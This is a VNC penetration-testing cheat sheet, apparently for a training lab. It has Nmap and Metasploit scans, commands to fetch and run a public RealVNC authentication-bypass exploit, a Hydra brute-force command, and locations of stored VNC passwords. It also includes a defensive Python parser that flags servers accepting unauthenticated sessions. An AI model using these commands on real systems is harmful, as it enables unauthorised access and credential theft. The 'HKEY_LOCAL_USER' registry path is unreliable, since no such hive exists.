VNC 5800 5900

1. Nmap - VNC Information and Vulnerability Scanning:

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13

2. Metasploit - VNC "None" Authentication Detection (vnc_none_auth)

use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run
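
What vnc-info and vnc_none_auth report is read from the first two server messages of the RFB handshake. The block below is an added example, not code from the original page or from Nmap or Metasploit: it parses those two messages from constructed byte captures and flags a server that offers the None security type. The function name and the sample captures are assumptions made for illustration.

```python
import struct

# Security-type numbers from the RFB protocol (RFC 6143 and the IANA registry).
SECURITY_TYPES = {1: "None", 2: "VNC Authentication", 16: "Tight",
                  18: "TLS", 19: "VeNCrypt"}

def parse_rfb_handshake(version_msg: bytes, security_msg: bytes) -> dict:
    """Parse the server's ProtocolVersion and security-type messages."""
    if (len(version_msg) != 12 or not version_msg.startswith(b"RFB ")
            or not version_msg.endswith(b"\n")):
        raise ValueError("not an RFB ProtocolVersion message")
    major, minor = int(version_msg[4:7]), int(version_msg[8:11])

    if (major, minor) < (3, 7):
        # RFB 3.3: the server picks one type and sends it as a uint32.
        if len(security_msg) < 4:
            raise ValueError("truncated security-type word")
        (chosen,) = struct.unpack(">I", security_msg[:4])
        offered = [chosen] if chosen else []
        rest = security_msg[4:]
    else:
        # RFB 3.7+: one count byte, then that many one-byte type codes.
        if not security_msg:
            raise ValueError("empty security message")
        count = security_msg[0]
        offered = list(security_msg[1:1 + count])
        if len(offered) != count:
            raise ValueError("truncated security-type list")
        rest = security_msg[1 + count:]

    reason = None
    if not offered:
        # Count/type 0 means refusal: uint32 length + reason string follow.
        if len(rest) < 4:
            raise ValueError("truncated failure reason")
        (length,) = struct.unpack(">I", rest[:4])
        reason = rest[4:4 + length].decode("latin-1")

    return {
        "version": f"{major}.{minor}",
        "offered": [SECURITY_TYPES.get(t, f"unknown({t})") for t in offered],
        "no_auth": 1 in offered,  # True means the server accepts sessions without a password
        "refused": reason,
    }

# Constructed sample captures (not taken from a real host).
SAMPLE_OPEN = (b"RFB 003.008\n", bytes([2, 1, 2]))
SAMPLE_AUTH = (b"RFB 003.003\n", struct.pack(">I", 2))
SAMPLE_REFUSED = (b"RFB 003.008\n", b"\x00" + struct.pack(">I", 8) + b"too many")
```

A result with no_auth set to True is the finding to fix on the server side: require a password or a TLS/VeNCrypt security type and restrict who can reach the port.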

3. RealVNC Authentication Bypass (Exploit):

sudo searchsploit -m windows/remote/36932.py
python2 36932.py  #input target IP

4. Hydra - Brute-forcing VNC

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

5. Password Default Locations

  • Linux (TightVNC/other): Default password is stored in:

    ~/.vnc/passwd
  • Windows - RealVNC: VNC password can be found in:

    HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
  • Windows - TightVNC: Password in:

    HKEY_CURRENT_USER\Software\TightVNC\Server
  • Windows - TigerVNC: Stored in:

    HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
  • Windows - UltraVNC: VNC credentials stored in:

    C:\Program Files\UltraVNC\ultravnc.ini
